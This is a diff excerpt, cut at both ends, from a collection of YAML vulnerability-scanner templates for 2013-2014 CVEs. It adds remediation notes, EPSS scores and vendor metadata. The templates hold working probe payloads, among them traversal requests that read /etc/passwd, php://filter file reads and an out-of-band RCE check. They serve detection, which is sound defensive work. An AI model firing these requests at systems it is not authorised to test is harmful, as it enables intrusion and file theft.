daffainfo severity: medium description: A cross-site scripting vulnerability in js/ta_loaded.js.php in the Traffic Analyzer plugin, possibly 3.3.2 and earlier, for WordPress allows remote attackers to inject arbitrary web script or HTML via the aoid parameter." + remediation: | + Upgrade to the latest version to mitigate this vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2013-3526 - http://packetstormsecurity.com/files/121167/WordPress-Traffic-Analyzer-Cross-Site-Scripting.html - - http://web.archive.org/web/20210123051939/https://www.securityfocus.com/bid/58948/ + - https://exchange.xforce.ibmcloud.com/vulnerabilities/83311 classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N cvss-score: 4.3 cve-id: CVE-2013-3526 cwe-id: CWE-79 + epss-score: 0.00431 + epss-percentile: 0.71668 + cpe: cpe:2.3:a:wptrafficanalyzer:trafficanalyzer:1.0.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: wptrafficanalyzer + product: trafficanalyzer google-query: inurl:"/wp-content/plugins/trafficanalyzer" tags: packetstorm,cve,cve2013,wordpress,xss,wp-plugin @@ -27,9 +34,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "" - part: body - type: word part: header @@ -40,4 +47,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/23 +# digest: 4a0a004730450221008f7a7f47358dde6cd29de824f3b2b3bc856408e8bd9185467a9072b13437e89d022020115882207687f77e6705117e7dbac64123cafb102fec7ce5fb2ee462d9b702:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2013/CVE-2013-3827.yaml b/http/cves/2013/CVE-2013-3827.yaml index d2d6adac87..ca1d3fc61f 100644 --- a/http/cves/2013/CVE-2013-3827.yaml +++ b/http/cves/2013/CVE-2013-3827.yaml @@ -5,19 +5,27 @@ info: author: Random-Robbie severity: medium description: An Unspecified vulnerability in the Oracle GlassFish Server component in Oracle Fusion Middleware 2.1.1, 3.0.1, and 3.1.2; the Oracle JDeveloper component in Oracle Fusion Middleware 11.1.2.3.0, 11.1.2.4.0, and 12.1.2.0.0; and the Oracle WebLogic Server component in Oracle Fusion Middleware 10.3.6.0 and 12.1.1 allows remote attackers to affect confidentiality via unknown vectors related to Java Server Faces or Web Container. + remediation: | + Apply the latest patches and updates for the affected software to fix the LFI vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2013-3827 - https://www.exploit-db.com/exploits/38802 - https://www.oracle.com/security-alerts/cpuoct2013.html - http://www.oracle.com/technetwork/topics/security/cpuoct2013-1899837.html + - http://rhn.redhat.com/errata/RHSA-2014-0029.html classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2013-3827 cwe-id: NVD-CWE-noinfo - tags: edb,cve,cve2013,lfi,javafaces,oracle + epss-score: 0.67719 + epss-percentile: 0.97597 + cpe: cpe:2.3:a:oracle:fusion_middleware:2.1.1:*:*:*:*:*:*:* metadata: max-request: 10 + vendor: oracle + product: fusion_middleware + tags: edb,cve,cve2013,lfi,javafaces,oracle http: - method: GET @@ -34,17 +42,18 @@ http: - "{{BaseURL}}/SupportPortlet/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.." stop-at-first-match: true + matchers-condition: and matchers: - type: word + part: body words: - "" - part: body condition: and - type: status status: - 200 -# Enhanced by mp on 2022/02/23 +# digest: 4b0a00483046022100bc87543ba654ace2fb6cc1fb2787a0538d04d7697c33b47270f474ff932a9a4e022100eb5c264819478b0858b8b9afbe66400717e5b588bfdd38af4b0aba499c4a649b:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2013/CVE-2013-4117.yaml b/http/cves/2013/CVE-2013-4117.yaml index 55504aac4e..96b55d4a84 100644 --- a/http/cves/2013/CVE-2013-4117.yaml +++ b/http/cves/2013/CVE-2013-4117.yaml @@ -5,19 +5,28 @@ info: author: daffainfo severity: medium description: A cross-site scripting vulnerability in includes/CatGridPost.php in the Category Grid View Gallery plugin 2.3.1 for WordPress allows remote attackers to inject arbitrary web script or HTML via the ID parameter. + remediation: | + Update to the latest version of the WordPress Plugin Category Grid View Gallery or apply the provided patch to fix the XSS vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2013-4117 - http://openwall.com/lists/oss-security/2013/07/11/11 - http://seclists.org/bugtraq/2013/Jul/17 + - http://exploit.iedb.ir/exploits-177.html + - http://packetstormsecurity.com/files/122259/WordPress-Category-Grid-View-Gallery-XSS.html classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N cvss-score: 4.3 cve-id: CVE-2013-4117 cwe-id: CWE-79 + epss-score: 0.01217 + epss-percentile: 0.83775 + cpe: cpe:2.3:a:anshul_sharma:category-grid-view-gallery:2.3.1:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: anshul_sharma + product: category-grid-view-gallery google-query: inurl:"/wp-content/plugins/category-grid-view-gallery" - tags: cve2013,wordpress,xss,wp-plugin,seclists,cve + tags: seclists,packetstorm,cve2013,wordpress,xss,wp-plugin,cve http: - method: GET @@ -27,9 +36,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "" - part: body - type: word part: header @@ -40,4 +49,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/23 +# digest: 4b0a00483046022100a913ed60262a01322451c5f2d3b8e64857ef8568ad838d50983cbb029a09f832022100a2c92319f64442cfe591d2eb3a0dd3a4abda7803091659701e148ed803eea4a0:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2013/CVE-2013-4625.yaml b/http/cves/2013/CVE-2013-4625.yaml index c6dd632cf8..2e4b1b5b55 100644 --- a/http/cves/2013/CVE-2013-4625.yaml +++ b/http/cves/2013/CVE-2013-4625.yaml @@ -5,19 +5,25 @@ info: author: daffainfo severity: medium description: A cross-site scripting vulnerability in files/installer.cleanup.php in the Duplicator plugin before 0.4.5 for WordPress allows remote attackers to inject arbitrary web script or HTML via the package parameter. + remediation: Upgrade to Duplicator 0.4.5 or later. reference: - https://nvd.nist.gov/vuln/detail/CVE-2013-4625 - https://packetstormsecurity.com/files/122535/WordPress-Duplicator-0.4.4-Cross-Site-Scripting.html - https://seclists.org/bugtraq/2013/Jul/160 - https://www.htbridge.com/advisory/HTB23162 - remediation: Upgrade to Duplicator 0.4.5 or later. + - http://packetstormsecurity.com/files/122535/WordPress-Duplicator-0.4.4-Cross-Site-Scripting.html classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N cvss-score: 4.3 cve-id: CVE-2013-4625 cwe-id: CWE-79 + epss-score: 0.01217 + epss-percentile: 0.83775 + cpe: cpe:2.3:a:cory_lamle:duplicator:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: cory_lamle + product: duplicator google-query: inurl:"/wp-content/plugins/duplicator" tags: seclists,cve,cve2013,wordpress,xss,wp-plugin,packetstorm @@ -29,9 +35,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "" - part: body - type: word part: header @@ -42,4 +48,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/24 +# digest: 4a0a00473045022100fe0a32ae8e4ecf3d1d58ccc38f6839439b524a68c25ad879978e57b150be68bd022002be101d9cf2630e5ddd390c6c0aefe3ba6bb127c72fbf51787f2b752c4b35c4:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2013/CVE-2013-5528.yaml b/http/cves/2013/CVE-2013-5528.yaml index 908f99f998..ef862b72a6 100644 --- a/http/cves/2013/CVE-2013-5528.yaml +++ b/http/cves/2013/CVE-2013-5528.yaml @@ -3,21 +3,27 @@ id: CVE-2013-5528 info: name: Cisco Unified Communications Manager 7/8/9 - Directory Traversal author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in the Tomcat administrative web interface in Cisco Unified Communications Manager allows remote authenticated users to read arbitrary files via directory traversal sequences in an unspecified input string, aka Bug ID CSCui78815 + remediation: | + Apply the necessary security patches or updates provided by Cisco to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/40887 - https://nvd.nist.gov/vuln/detail/CVE-2014-3120 - http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2013-5528 - - http://web.archive.org/web/20210122130958/https://www.securityfocus.com/bid/62960/ classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:S/C:P/I:N/A:N cvss-score: 4 cve-id: CVE-2013-5528 cwe-id: CWE-22 - tags: cve,cve2013,lfi,cisco,edb + epss-score: 0.00565 + epss-percentile: 0.75249 + cpe: cpe:2.3:a:cisco:unified_communications_manager:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: cisco + product: unified_communications_manager + tags: cve,cve2013,lfi,cisco,edb http: - method: GET @@ -26,7 +32,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" @@ -35,4 +40,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/24 +# digest: 4b0a00483046022100f259a88b52e2ad665a778b9a08fc341c38d2fc1c46290fc7b5efc78ca37fa79b022100878cc33ac07eab447453275373bbea21d4b953e84a3e1a8457e9749215b30553:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2013/CVE-2013-5979.yaml b/http/cves/2013/CVE-2013-5979.yaml index 266dcce45a..d28235934c 100644 --- a/http/cves/2013/CVE-2013-5979.yaml +++ b/http/cves/2013/CVE-2013-5979.yaml @@ -3,20 +3,28 @@ id: CVE-2013-5979 info: name: Xibo 1.2.2/1.4.1 - Directory Traversal author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in Spring Signage Xibo 1.2.x before 1.2.3 and 1.4.x before 1.4.2 allows remote attackers to read arbitrary files via a .. (dot dot) in the p parameter to index.php. + remediation: | + Upgrade to a patched version of Xibo. reference: - https://www.exploit-db.com/exploits/26955 - https://nvd.nist.gov/vuln/detail/CVE-2013-5979 - https://bugs.launchpad.net/xibo/+bug/1093967 + - http://www.baesystemsdetica.com.au/Research/Advisories/Xibo-Directory-Traversal-Vulnerability-(DS-2013-00 classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2013-5979 cwe-id: CWE-22 - tags: cve,cve2013,lfi,edb + epss-score: 0.06969 + epss-percentile: 0.93191 + cpe: cpe:2.3:a:springsignage:xibo:1.2.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: springsignage + product: xibo + tags: cve,cve2013,lfi,edb http: - method: GET @@ -25,7 +33,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" @@ -34,4 +41,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/24 +# digest: 4b0a00483046022100c3734c59b4e4d90817ad7c6569628ae588b69f931f576ef9a9bf044f87671976022100835c715ed62b85e057eea6e7156415c741954af50626929c194d457e82dde793:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2013/CVE-2013-6281.yaml b/http/cves/2013/CVE-2013-6281.yaml index a680b38686..2ec2f9c66b 100644 --- a/http/cves/2013/CVE-2013-6281.yaml +++ b/http/cves/2013/CVE-2013-6281.yaml @@ -6,21 +6,28 @@ info: severity: medium description: | WordPress Spreadsheet plugin contains a reflected cross-site scripting vulnerability in /dhtmlxspreadsheet/codebase/spreadsheet.php. + remediation: | + Update the WordPress Spreadsheet plugin to the latest version, which includes proper input sanitization to mitigate the XSS vulnerability. reference: - https://wpscan.com/vulnerability/49785932-f4e0-4aaa-a86c-4017890227bf - - http://web.archive.org/web/20210213174519/https://www.securityfocus.com/bid/63256/ - https://wordpress.org/plugins/dhtmlxspreadsheet/ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6281 - https://nvd.nist.gov/vuln/detail/CVE-2013-6281 classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 + cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N + cvss-score: 4.3 cve-id: CVE-2013-6281 cwe-id: CWE-79 + epss-score: 0.00209 + epss-percentile: 0.58662 + cpe: cpe:2.3:a:dhtmlx:dhtmlxspreadsheet:2.0:-:*:*:*:wordpress:*:* metadata: - max-request: 1 - google-query: inurl:/wp-content/plugins/dhtmlxspreadsheet verified: true + max-request: 1 + vendor: dhtmlx + product: dhtmlxspreadsheet + framework: wordpress + google-query: inurl:/wp-content/plugins/dhtmlxspreadsheet tags: wp,wpscan,cve,cve2013,wordpress,xss,wp-plugin http: @@ -47,4 +54,4 @@ http: status: - 200 -# Enhanced by mp on 2022/08/12 +# digest: 4b0a00483046022100e8d8664f6eab50ce396c3b67545f58ced5d326982b22fd3711775e69d38a7b2c022100e9fbf0cbd7ab21973544c72c5b3e29c9a16e7de3198901e0f5a5c0f8fd8904a1:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2013/CVE-2013-7091.yaml b/http/cves/2013/CVE-2013-7091.yaml index 045943753c..f1430e6d62 100644 --- a/http/cves/2013/CVE-2013-7091.yaml +++ b/http/cves/2013/CVE-2013-7091.yaml @@ -3,21 +3,29 @@ id: CVE-2013-7091 info: name: Zimbra Collaboration Server 7.2.2/8.0.2 Local File Inclusion author: rubina119 - severity: critical + severity: medium description: A directory traversal vulnerability in /res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz in Zimbra 7.2.2 and 8.0.2 allows remote attackers to read arbitrary files via a .. (dot dot) in the skin parameter. This can be leveraged to execute arbitrary code by obtaining LDAP credentials and accessing the service/admin/soap API. + remediation: | + Apply the latest security patches or upgrade to a newer version of Zimbra Collaboration Server to mitigate the LFI vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2013-7091 - https://www.exploit-db.com/exploits/30085 - https://www.exploit-db.com/exploits/30472 - http://www.exploit-db.com/exploits/30085 + - http://packetstormsecurity.com/files/124321 classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2013-7091 cwe-id: CWE-22 - tags: zimbra,lfi,edb,cve,cve2013 + epss-score: 0.97375 + epss-percentile: 0.99875 + cpe: cpe:2.3:a:synacor:zimbra_collaboration_suite:6.0.0:*:*:*:*:*:*:* metadata: max-request: 2 + vendor: synacor + product: zimbra_collaboration_suite + tags: packetstorm,zimbra,lfi,edb,cve,cve2013 http: - method: GET @@ -26,6 +34,7 @@ http: - "{{BaseURL}}/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../etc/passwd%00" stop-at-first-match: true + matchers-condition: or matchers: - type: word @@ -43,4 +52,4 @@ http: regex: - "root=.*:0:0" -# Enhanced by mp on 2022/02/24 +# digest: 4a0a0047304502206512cb92d2ef60619e5d7a554872d049cc70ce0444006c361b39ad1d6c0cb33a022100934cb60d1ee47eb95f3aa84a3fea1cf8797492bd337ac93c9ad0e6f390dc2a64:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2013/CVE-2013-7240.yaml b/http/cves/2013/CVE-2013-7240.yaml index 11eab76d8a..4c0f32b294 100644 --- a/http/cves/2013/CVE-2013-7240.yaml +++ b/http/cves/2013/CVE-2013-7240.yaml @@ -3,20 +3,28 @@ id: CVE-2013-7240 info: name: WordPress Plugin Advanced Dewplayer 1.2 - Directory Traversal author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in download-file.php in the Advanced Dewplayer plugin 1.2 for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the dew_file parameter. + remediation: | + Update to the latest version of the Advanced Dewplayer plugin or remove it if it is not actively used. reference: - https://www.exploit-db.com/exploits/38936 - https://nvd.nist.gov/vuln/detail/CVE-2013-7240 - https://wordpress.org/support/topic/security-vulnerability-cve-2013-7240-directory-traversal/ - http://seclists.org/oss-sec/2013/q4/570 + - http://seclists.org/oss-sec/2013/q4/566 classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 + cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N + cvss-score: 5 cve-id: CVE-2013-7240 cwe-id: CWE-22 + epss-score: 0.25635 + epss-percentile: 0.96154 + cpe: cpe:2.3:a:westerndeal:advanced_dewplayer:1.2:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: westerndeal + product: advanced_dewplayer google-query: inurl:"/wp-content/plugins/advanced-dewplayer/" tags: wp-plugin,lfi,edb,seclists,cve,cve2013,wordpress @@ -28,16 +36,16 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "DB_NAME" - "DB_PASSWORD" - "DB_HOST" - "The base configurations of the WordPress" - part: body condition: and - type: status status: - 200 -# Enhanced by mp on 2022/02/24 +# digest: 490a0046304402203afa950e5ce229e6228ec2ef5c0845b355a29918b5c97741523e7ea40e211c8202202ee46fb6c3bffe04f7bfb79c11b0dd20115fdc6764bd0d12566a3c7ce277e450:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2013/CVE-2013-7285.yaml b/http/cves/2013/CVE-2013-7285.yaml index cd151efaa9..40b87b4043 100644 --- a/http/cves/2013/CVE-2013-7285.yaml +++ b/http/cves/2013/CVE-2013-7285.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Xstream API before 1.4.6 and 1.4.10 is susceptible to remote code execution. If the security framework has not been initialized, an attacker can run arbitrary shell commands by manipulating the processed input stream when unmarshaling XML or any supported format. This can allow an attacker to obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. + remediation: | + Upgrade XStream to version 1.4.10 or later to mitigate this vulnerability. reference: - https://x-stream.github.io/CVE-2013-7285.html - https://www.mail-archive.com/user@xstream.codehaus.org/msg00607.html @@ -17,11 +19,14 @@ info: cvss-score: 9.8 cve-id: CVE-2013-7285 cwe-id: CWE-78 - cpe: cpe:2.3:a:xstream_project:xstream:*:*:*:*:*:*:*:* epss-score: 0.33561 - tags: cve,cve2013,xstream,deserialization,rce,oast + epss-percentile: 0.96563 + cpe: cpe:2.3:a:xstream_project:xstream:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: xstream_project + product: xstream + tags: cve,cve2013,xstream,deserialization,rce,oast http: - raw: @@ -57,4 +62,5 @@ http: part: interactsh_request words: - "User-Agent: curl" -# Enhanced by md on 2023/04/12 + +# digest: 4b0a00483046022100d3f562c8d361425c45e3acf4221f26bad4716dc1ce06d655e64a75ebf40d4f14022100d3390696ac408d24f53d33de5d6ee2257816afd2281f18a7f7b2e73aca0383a7:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2014/CVE-2014-10037.yaml b/http/cves/2014/CVE-2014-10037.yaml index 0e5f1e2115..3a10d84367 100644 --- a/http/cves/2014/CVE-2014-10037.yaml +++ b/http/cves/2014/CVE-2014-10037.yaml @@ -5,18 +5,26 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in DomPHP 0.83 and earlier allows remote attackers to have unspecified impacts via a .. (dot dot) in the url parameter to photoalbum/index.php. + remediation: | + Upgrade to a patched version of DomPHP or apply the necessary security patches to fix the directory traversal vulnerability. reference: - https://www.exploit-db.com/exploits/30865 - https://nvd.nist.gov/vuln/detail/CVE-2014-10037 - http://www.exploit-db.com/exploits/30865 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/90582 classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2014-10037 cwe-id: CWE-22 - tags: cve,cve2014,lfi,edb + epss-score: 0.18676 + epss-percentile: 0.9565 + cpe: cpe:2.3:a:domphp:domphp:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: domphp + product: domphp + tags: cve,cve2014,lfi,edb http: - method: GET @@ -25,7 +33,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" @@ -34,4 +41,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/24 +# digest: 490a00463044022069608ebdbaf3cbfa255c56d8bf25ba671703e8cf6a258c2a97893455c707f8bd022047972bc4938ff11e0d5e400307914fa23bae643502efd933d946094b6708c8a7:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2014/CVE-2014-1203.yaml b/http/cves/2014/CVE-2014-1203.yaml index e87a855774..971ee9ce30 100644 --- a/http/cves/2014/CVE-2014-1203.yaml +++ b/http/cves/2014/CVE-2014-1203.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: critical description: Eyou Mail System before 3.6 allows remote attackers to execute arbitrary commands via shell metacharacters in the domain parameter to admin/domain/ip_login_set/d_ip_login_get.php via the get_login_ip_config_file function. + remediation: | + Upgrade to a patched version of Eyou E-Mail <3.6 or apply the necessary security patches. reference: - https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g - https://nvd.nist.gov/vuln/detail/CVE-2014-1203 @@ -14,11 +16,14 @@ info: cvss-score: 9.8 cve-id: CVE-2014-1203 cwe-id: CWE-77 - cpe: cpe:2.3:a:eyou:eyou:*:*:*:*:*:*:*:* epss-score: 0.02045 - tags: seclists,rce,eyou + epss-percentile: 0.87742 + cpe: cpe:2.3:a:eyou:eyou:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: eyou + product: eyou + tags: seclists,rce,eyou http: - raw: @@ -32,12 +37,12 @@ http: matchers-condition: and matchers: - type: regex + part: body regex: - "root:.*:0:0:" - part: body - type: status status: - 200 -# Enhanced by mp on 2022/06/01 +# digest: 4a0a00473045022100c36401fc803491ec79073878b4a6a8d8f349ebe1f68191cd6a3da3bf41a73e1c022059a1ce394c255bc241fdc588e37658797e1b335dfc839424ffc807145b2045f6:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2014/CVE-2014-2321.yaml b/http/cves/2014/CVE-2014-2321.yaml index dc930653c2..09bcf4f134 100644 --- a/http/cves/2014/CVE-2014-2321.yaml +++ b/http/cves/2014/CVE-2014-2321.yaml @@ -3,22 +3,30 @@ id: CVE-2014-2321 info: name: ZTE Cable Modem Web Shell author: geeknik - severity: high + severity: critical description: | ZTE F460 and F660 cable modems allows remote attackers to obtain administrative access via sendcmd requests to web_shell_cmd.gch, as demonstrated by using "set TelnetCfg" commands to enable a TELNET service with specified credentials. + remediation: | + Apply the latest firmware update provided by ZTE to fix the vulnerability reference: - https://yosmelvin.wordpress.com/2017/09/21/f660-modem-hack/ - https://jalalsela.com/zxhn-h108n-router-web-shell-secrets/ - https://nvd.nist.gov/vuln/detail/CVE-2014-2321 - http://www.kb.cert.org/vuls/id/600724 + - http://www.myxzy.com/post-411.html classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:C/I:C/A:C cvss-score: 10 cve-id: CVE-2014-2321 cwe-id: CWE-264 - tags: iot,cve,cve2014,zte + epss-score: 0.96364 + epss-percentile: 0.99397 + cpe: cpe:2.3:h:zte:f460:-:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: zte + product: f460 + tags: iot,cve,cve2014,zte http: - method: GET @@ -28,14 +36,14 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "please input shell command" - "ZTE Corporation. All rights reserved" - part: body condition: and - type: status status: - 200 -# Enhanced by mp on 2022/04/01 +# digest: 490a004630440220097de2a151ae2fccfbbf186f446248d8888ace8bb7c2b81d26c62bf2fe01428202206473d4cd7013066342bf6c3a9979fef9e69618418d697547c7ad0c60b5023ad6:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2014/CVE-2014-2323.yaml b/http/cves/2014/CVE-2014-2323.yaml index c1f9c4bf29..69bf974b06 100644 --- a/http/cves/2014/CVE-2014-2323.yaml +++ b/http/cves/2014/CVE-2014-2323.yaml @@ -5,20 +5,27 @@ info: author: geeknik severity: critical description: A SQL injection vulnerability in mod_mysql_vhost.c in lighttpd before 1.4.35 allows remote attackers to execute arbitrary SQL commands via the host name (related to request_check_hostname). + remediation: | + Upgrade to a patched version of Lighttpd or apply the necessary security patches reference: - https://nvd.nist.gov/vuln/detail/CVE-2014-2323 - https://download.lighttpd.net/lighttpd/security/lighttpd_sa_2014_01.txt - http://www.lighttpd.net/2014/3/12/1.4.35/ - http://seclists.org/oss-sec/2014/q1/561 + - http://jvn.jp/en/jp/JVN37417423/index.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2014-2323 cwe-id: CWE-89 - epss-score: 0.97012 - tags: lighttpd,injection,seclists,cve,cve2014,sqli + epss-score: 0.9637 + epss-percentile: 0.99402 + cpe: cpe:2.3:a:lighttpd:lighttpd:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: lighttpd + product: lighttpd + tags: lighttpd,injection,seclists,cve,cve2014,sqli http: - raw: @@ -32,4 +39,4 @@ http: regex: - "root:[x*]:0:0:" -# Enhanced by mp on 2022/02/24 +# digest: 4b0a00483046022100e8b0f8f85e4f866e99466029f3be6214d0b3b2226d665dc8ccae6fcf261dd71b022100972a349a54ac3432f31fc6983a9390a27ad9673db1f48c2d7fa8d4d3e5ebff0f:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2014/CVE-2014-2383.yaml b/http/cves/2014/CVE-2014-2383.yaml index 77d8d99bd0..05cd724756 100644 --- a/http/cves/2014/CVE-2014-2383.yaml +++ b/http/cves/2014/CVE-2014-2383.yaml @@ -3,9 +3,11 @@ id: CVE-2014-2383 info: name: Dompdf < v0.6.0 - Local File Inclusion author: 0x_Akoko,akincibor,ritikchaddha - severity: high + severity: medium description: | A vulnerability in dompdf.php in dompdf before 0.6.1, when DOMPDF_ENABLE_PHP is enabled, allows context-dependent attackers to bypass chroot protections and read arbitrary files via a PHP protocol and wrappers in the input_file parameter, as demonstrated by a php://filter/read=convert.base64-encode/resource in the input_file parameter. + remediation: | + Upgrade Dompdf to a version higher than v0.6.0 to mitigate the vulnerability. reference: - https://www.exploit-db.com/exploits/33004 - http://seclists.org/fulldisclosure/2014/Apr/258 @@ -13,13 +15,18 @@ info: - https://wpscan.com/vulnerability/1d64d0cb-6b71-47bb-8807-7c8350922582 - https://nvd.nist.gov/vuln/detail/CVE-2014-2383 classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cwe-id: CWE-22 + cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P + cvss-score: 6.8 cve-id: CVE-2014-2383 + cwe-id: CWE-200 + epss-score: 0.00723 + epss-percentile: 0.7852 + cpe: cpe:2.3:a:dompdf:dompdf:*:beta3:*:*:*:*:*:* metadata: - max-request: 11 verified: true + max-request: 11 + vendor: dompdf + product: dompdf tags: cve,lfi,wp-plugin,wpscan,cve2014,dompdf,wordpress,wp,edb,seclists http: @@ -38,21 +45,22 @@ http: - "{{BaseURL}}/wp-content/plugins/wp-ecommerce-shop-styling/includes/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd" stop-at-first-match: true + matchers-condition: and matchers: - - type: regex - regex: - - "root:[x*]:0:0" - - type: word + part: header words: - "application/pdf" - 'filename="dompdf_out.pdf"' - part: header condition: and + - type: regex + regex: + - "root:[x*]:0:0" + - type: status status: - 200 -# Enhanced by mp on 2022/08/06 +# digest: 4a0a004730450221008bec17332e8f29101fd43550101670cbb0317f26e74b8e3912dd6bf06e51bf330220486959047961eab5a8e32937b25d769512e904164c4a11c94d80cdb0f5dcae07:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2014/CVE-2014-2908.yaml b/http/cves/2014/CVE-2014-2908.yaml index e5a309b7e1..8c8f0d44e1 100644 --- a/http/cves/2014/CVE-2014-2908.yaml +++ b/http/cves/2014/CVE-2014-2908.yaml @@ -5,20 +5,26 @@ info: author: daffainfo severity: medium description: A cross-site scripting vulnerability in the integrated web server on Siemens SIMATIC S7-1200 CPU devices 2.x and 3.x allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. + remediation: Upgrade to v4.0 or later. reference: - https://www.exploit-db.com/exploits/44687 - https://cert-portal.siemens.com/productcert/pdf/ssa-892012.pdf - https://nvd.nist.gov/vuln/detail/CVE-2014-2908 - http://ics-cert.us-cert.gov/advisories/ICSA-14-114-02 - remediation: Upgrade to v4.0 or later. + - http://www.siemens.com/innovation/pool/de/forschungsfelder/siemens_security_advisory_ssa-892012.pdf classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N cvss-score: 4.3 cve-id: CVE-2014-2908 cwe-id: CWE-79 - tags: cve,cve2014,xss,siemens,edb + epss-score: 0.00594 + epss-percentile: 0.75962 + cpe: cpe:2.3:o:siemens:simatic_s7_cpu_1200_firmware:2.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: siemens + product: simatic_s7_cpu_1200_firmware + tags: cve,cve2014,xss,siemens,edb http: - method: GET @@ -41,4 +47,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/23 +# digest: 4a0a00473045022100a4e813a9e6046113c33978b7925cc81799e3c28e7d325aec1ce57cb465aee6bc02203f9ec9f69abbf39852aa6a2232d8911be37fd6d2d97d85188291f7cb5c963d21:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2014/CVE-2014-2962.yaml b/http/cves/2014/CVE-2014-2962.yaml index c650d762b4..ebf472cea9 100644 --- a/http/cves/2014/CVE-2014-2962.yaml +++ b/http/cves/2014/CVE-2014-2962.yaml @@ -5,20 +5,26 @@ info: author: daffainfo severity: high description: A path traversal vulnerability in the webproc cgi module on the Belkin N150 F9K1009 v1 router with firmware before 1.00.08 allows remote attackers to read arbitrary files via a full pathname in the getpage parameter. + remediation: Ensure that 